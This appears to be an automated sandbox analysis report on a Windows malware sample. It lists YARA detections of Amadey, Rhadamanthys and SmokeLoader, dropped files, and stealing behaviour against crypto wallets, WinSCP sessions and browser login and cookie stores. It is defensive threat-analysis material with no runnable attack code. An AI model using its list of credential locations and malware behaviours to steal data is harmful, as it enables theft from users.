Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Roaming\ab10c56eed80d1\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Roaming\ab10c56eed80d1\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Roaming\ab10c56eed80d1\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Roaming\ab10c56eed80d1\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BFF83C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe, 13_3_00007DF488BFF83C
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_0058065A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime, 24_2_0058065A
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_00566080 DeleteObject,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority, 24_2_00566080
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_005A5DE7 _free,_free,_free,GetTimeZoneInformation,_free, 24_2_005A5DE7
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Code function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403532
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: dialer.exe, 00000008.00000002.2179356766.0000000003394000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tcpview.exe

Stealing of Sensitive Information
barindex
Yara detected Amadey
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Yara detected Amadeys stealer DLL
Source: Yara match File source: 31.0.Utsysc.exe.5f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.F557.exe.560000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.0.Utsysc.exe.5f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.Utsysc.exe.5f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.F557.exe.560000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.2762475426.0000000000561000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.2780370976.00000000005F1000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.2747569546.000000000B660000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000000.2750807460.00000000005F1000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.2743120667.0000000000561000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2784341103.00000000005F1000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\F557.exe, type: DROPPED
Yara detected RHADAMANTHYS Stealer
Source: Yara match File source: 00000023.00000003.2810520451.00000000031B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.2809730416.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2986526967.0000000005095000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2222138286.0000024ABA9F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.2775779398.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2105828144.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2511978999.0000024ABABF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2179795455.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.3073347750.0000022CBCA81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.3026163870.0000000004880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2109261264.0000000003610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match File source: 22.2.gfiecjd.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.AppLaunch.exe.1ff003ad060.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.D4C0.vmt.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.gfiecjd.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.AppLaunch.exe.1ff003bd080.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.D4C0.vmt.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.AppLaunch.exe.1ff003b4af0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000016.00000002.2788977995.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2538928588.0000000000521000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2538295136.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2790746450.0000000001EB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\gfiecjd, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe, type: DROPPED
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\031db23f-f53a-4d6b-b429-cd0302ef56d3
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\safebrowsing
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\a5f61848-f128-4a80-965b-a3000feed295
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\startupCache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\trash4675
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\ms-language-packs\browser\newtab
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\safebrowsing\google4
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\entries
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
